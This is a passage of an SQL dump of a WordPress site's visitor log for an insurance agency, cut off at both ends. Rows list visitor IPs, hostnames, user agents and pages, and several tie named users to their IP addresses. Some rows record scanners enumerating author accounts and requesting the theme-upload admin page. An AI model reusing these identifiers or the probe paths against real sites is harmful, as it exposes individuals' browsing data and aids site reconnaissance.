49','us','','','','','','','0','0',0),(20127,'0b_bac15f15d1a0df5b1c11aa83aaef02a6','1461262491','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(20129,'0b_20514dd3ade0a39203a6dfbc325bbc3f','1461262567','192.3.208.135','192-3-208-135-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 34','us','','','','','','','0','0',0),(20130,'0b_2e9fc366f54cafe06e737d731eaeae43','1461262814','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(20132,'0b_86a3bd30fa2e63339147f1443c0c4c8f','1461262958','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(20133,'0b_22aa755c47eff6dbe1035a442ec3171c','1461262961','141.8.143.235','spider-141-8-143-235.yandex.com','/case-status/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20135,'0b_31c2cc6321450fc4e515a433a49e7ada','1461264364','66.249.83.150,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(20136,'0b_19cd5ea5d4d22769575ac63d0d86b243','1461265248','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20138,'0b_19cd5ea5d4d22769575ac63d0d86b243','1461265248','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20139,'0b_19cd5ea5d4d22769575ac63d0d86b243','1461265250','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20142,'0b_19cd5ea5d4d22769575ac63d0d86b243','1461265253','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20144,'0b_19cd5ea5d4d22769575ac63d0d86b243','1461265272','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(20147,'0b_3dd7ab1831ae072b611e5881534c822a','1461265498','188.163.110.39','sol-fttb.39.110.163.188.sovam.net.ua','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','ua','','','','','','','3','0',0),(20148,'0b_3dd7ab1831ae072b611e5881534c822a','1461265502','188.163.110.39','sol-fttb.39.110.163.188.sovam.net.ua','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','ua','','','','','','','3','0',0),(20150,'0b_d49eb154f5a4f588744cf8e2d7a333e4','1461266117','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(20151,'0b_d49eb154f5a4f588744cf8e2d7a333e4','1461266686','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(20154,'0b_d49eb154f5a4f588744cf8e2d7a333e4','1461266687','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(20156,'0b_8f3a9df777a5369efbbb3faf3f68cfeb','1461267154','64.233.172.181,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(20157,'0b_9afca5e6f70fd7d668474aa09fc43bfc','1461267242','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(20159,'0b_9afca5e6f70fd7d668474aa09fc43bfc','1461267243','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(20160,'0b_51ecc96238e6e7bf95a99de855fa32b4','1461268611','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(20162,'0b_51ecc96238e6e7bf95a99de855fa32b4','1461268613','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(20163,'0b_51ecc96238e6e7bf95a99de855fa32b4','1461268638','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(20165,'0b_51ecc96238e6e7bf95a99de855fa32b4','1461268645','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(20166,'0b_d49eb154f5a4f588744cf8e2d7a333e4','1461269330','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(20169,'0b_fd144db95dcfa77f92352705392b3115','1461269867','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(20171,'0b_c3e56e4d3a173014fdf7018cea1712f7','1461271502','167.114.76.220','ns50.kioza.net','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20172,'0b_c3e56e4d3a173014fdf7018cea1712f7','1461271502','167.114.76.220','ns50.kioza.net','/?author=0','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20175,'0b_c3e56e4d3a173014fdf7018cea1712f7','1461271503','167.114.76.220','ns50.kioza.net','/?author=4','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20178,'0b_30840fc0c24cfea127d1733bfc4116f9','1461271659','40.77.167.63','msnbot-40-77-167-63.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20180,'0b_bfc49fd3ed4fed0400a5204db404c761','1461272112','52.39.136.221','ec2-52-39-136-221.us-west-2.compute.amazonaws.com','/','WWW-Mechanize/1.73','','',0,'','','','','','WWW','','','','0','0',0),(20181,'0b_3bf5cabdf64f3f97f74cb9b4a1f3a683','1461272592','66.249.69.47','crawl-66-249-69-47.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20184,'0b_4fa152a6de26dc3e17b2391911aeed9c','1461272593','66.249.69.47','crawl-66-249-69-47.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(20187,'0b_be99c4860b6ee5fbd4c69a05f89e4f22','1461273531','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20190,'0b_be99c4860b6ee5fbd4c69a05f89e4f22','1461273542','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20192,'0b_be99c4860b6ee5fbd4c69a05f89e4f22','1461273554','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20193,'0b_be99c4860b6ee5fbd4c69a05f89e4f22','1461273587','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(20195,'0b_704a2376e45dc88e9ef552563ab986c9','1461275469','180.76.15.14','baiduspider-180-76-15-14.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(20196,'0b_804081afed4ea397ebdeae6a24908866','1461276033','45.33.59.157','li1009-157.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(20199,'0b_e4f02050e30fa02b160c218e2727f12c','1461276241','157.55.39.155','msnbot-157-55-39-155.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20201,'0b_9653c648717a77076a48afa53e177c58','1461279252','23.95.62.54','23-95-62-54-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 34','us','','','','','','','0','0',0),(20202,'0b_59059539d5c62e5af6fe174baf7f7c8f','1461280033','51.255.162.166','166.ip-51-255-162.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(20205,'0b_59059539d5c62e5af6fe174baf7f7c8f','1461280035','51.255.162.166','166.ip-51-255-162.eu','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(20207,'0b_59059539d5c62e5af6fe174baf7f7c8f','1461280046','51.255.162.166','166.ip-51-255-162.eu','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(20208,'0b_88f4197cff998028d079987a3c10ccc6','1461281095','207.46.13.186','msnbot-207-46-13-186.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20210,'0b_74c57dae9a6fa6476d2adfd5db66c194','1461281314','94.22.47.242','f498.ip12.netikka.fi','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','3','0',0),(20211,'0b_74c57dae9a6fa6476d2adfd5db66c194','1461281317','94.22.47.242','f498.ip12.netikka.fi','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','3','0',0),(20213,'0b_74c57dae9a6fa6476d2adfd5db66c194','1461281319','94.22.47.242','f498.ip12.netikka.fi','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','3','0',0),(20216,'0b_74c57dae9a6fa6476d2adfd5db66c194','1461281330','94.22.47.242','f498.ip12.netikka.fi','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','3','0',0),(20217,'0b_74c57dae9a6fa6476d2adfd5db66c194','1461281334','94.22.47.242','f498.ip12.netikka.fi','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','3','0',0),(20220,'0b_74c57dae9a6fa6476d2adfd5db66c194','1461281335','94.22.47.242','f498.ip12.netikka.fi','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','3','0',0),(20223,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282388','5.9.63.149','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20225,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282391','5.9.63.149','majestic12.co.uk','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20226,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282392','5.9.63.149','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20228,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282394','5.9.63.149','majestic12.co.uk','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20229,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282397','5.9.63.149','majestic12.co.uk','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20232,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282401','5.9.63.149','majestic12.co.uk','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20235,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282405','5.9.63.149','majestic12.co.uk','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20238,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282410','5.9.63.149','majestic12.co.uk','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20241,'0b_b30ba61d7e45aa91fe76de17bb42ce98','1461282412','5.9.63.149','majestic12.co.uk','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(20244,'0b_7762cd4c8f2e0804807f0c4fd373e647','1461283553','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20246,'0b_2dc410998977399d8d7ef0a8693de4c2','1461283557','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)','http://www.budpost.com.ua/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(20249,'0b_e051b15862abb59bd9263996764f8f84','1461283608','66.249.69.47','crawl-66-249-69-47.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(20250,'0b_7762cd4c8f2e0804807f0c4fd373e647','1461284588','157.55.39.158','msnbot-157-55-39-158.search.msn.com','/agent-tools/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20252,'0b_b70459fdcea27c57fc7645865b18e120','1461285248','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20255,'0b_ee5cf1715927a0ada6beae32137ac14b','1461285478','100.43.81.152','spider-100-43-81-152.yandex.com','/members/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20258,'0b_19ac1f971edf07613708a8f6a67ff5ee','1461285603','141.8.143.235','spider-141-8-143-235.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20259,'0b_b70459fdcea27c57fc7645865b18e120','1461286107','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20261,'0b_7a0b23531def05ca8917cd955611b228','1461286545','40.77.167.65','msnbot-40-77-167-65.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20262,'0b_5bf3e6c8daa9cb8c8c432e5cd800cb34','1461287338','91.121.79.180','crawl07.lp.007ac9.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20265,'0b_f1ab21ccdd6ee030d89289b6e54f8cdd','1461287339','91.121.79.180','crawl07.lp.007ac9.net','/','Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17','','',0,'Win7','Chrome 10','de','','','Unknown Spider','','','','0','0',0),(20268,'0b_021cd1a3d30adc35e54db5beebc3113f','1461288160','62.210.220.107','62-210-220-107.rev.poneytelecom.eu','/?author=1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Linux','Firefox 45','eu','','','','','','','0','0',0),(20271,'0b_021cd1a3d30adc35e54db5beebc3113f','1461288164','62.210.220.107','62-210-220-107.rev.poneytelecom.eu','/author/admin/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Linux','Firefox 45','eu','','','','','','','0','0',0),(20273,'0b_f55dc893a8e19c6d10544d05153fb1f2','1461289269','64.246.165.200','www.whois.sc','/robots.txt','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(20274,'0b_f55dc893a8e19c6d10544d05153fb1f2','1461289270','64.246.165.200','www.whois.sc','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','http://whois.domaintools.com/empireins.com','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(20277,'0b_0362f4a491430bd232dc58dfa444210b','1461296461','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20280,'0b_0362f4a491430bd232dc58dfa444210b','1461296462','178.255.215.70','crawl06.exabot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20282,'0b_0362f4a491430bd232dc58dfa444210b','1461296596','178.255.215.70','crawl06.exabot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20283,'0b_0362f4a491430bd232dc58dfa444210b','1461296598','178.255.215.70','crawl06.exabot.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20285,'0b_9b866535fa61b0badab57e7fab932fce','1461297685','66.249.69.47','crawl-66-249-69-47.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20288,'0b_7977c281e2b0ce4103d0801ae99075c0','1461298489','40.77.167.54','msnbot-40-77-167-54.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20291,'0b_1faef1c5e054bfb8a40b88b1e8236123','1461299866','195.154.217.112','athena.netw0rk.ch','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','ch','','','','','','','0','0',0),(20292,'0b_1faef1c5e054bfb8a40b88b1e8236123','1461299867','195.154.217.112','athena.netw0rk.ch','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','ch','','','','','','','0','0',0),(20294,'0b_1faef1c5e054bfb8a40b88b1e8236123','1461299868','195.154.217.112','athena.netw0rk.ch','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','ch','','','','','','','0','0',0),(20295,'0b_c14f09b4160184760424b4d770d9b6d1','1461300939','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20297,'0b_c14f09b4160184760424b4d770d9b6d1','1461300942','144.76.93.46','static.46.93.76.144.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20300,'0b_c14f09b4160184760424b4d770d9b6d1','1461300945','144.76.93.46','static.46.93.76.144.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20303,'0b_c14f09b4160184760424b4d770d9b6d1','1461300948','144.76.93.46','static.46.93.76.144.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20306,'0b_8510badc99461dd5e3c40f6ae3ee8119','1461303938','176.9.10.227','static.227.10.9.176.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20307,'0b_8510badc99461dd5e3c40f6ae3ee8119','1461303940','176.9.10.227','static.227.10.9.176.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20309,'0b_e611ce2e65ac52bc011e702d49a0838e','1461304986','95.141.36.94','server2016.italmarket.com','/?author=0','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20312,'0b_7cb1a773d5b2a42d583cd91331dfc998','1461305765','192.3.152.105','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(20313,'0b_3645a1c26b1ed23715a93e11074cb7f6','1461307815','62.212.73.211','evo-hl21-1.gameservers.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(20316,'0b_3645a1c26b1ed23715a93e11074cb7f6','1461307818','62.212.73.211','evo-hl21-1.gameservers.net','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(20319,'0b_3645a1c26b1ed23715a93e11074cb7f6','1461307820','62.212.73.211','evo-hl21-1.gameservers.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(20322,'0b_e7d9086bddade5752dd74451699e71eb','1461308417','66.249.69.39','crawl-66-249-69-39.googlebot.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 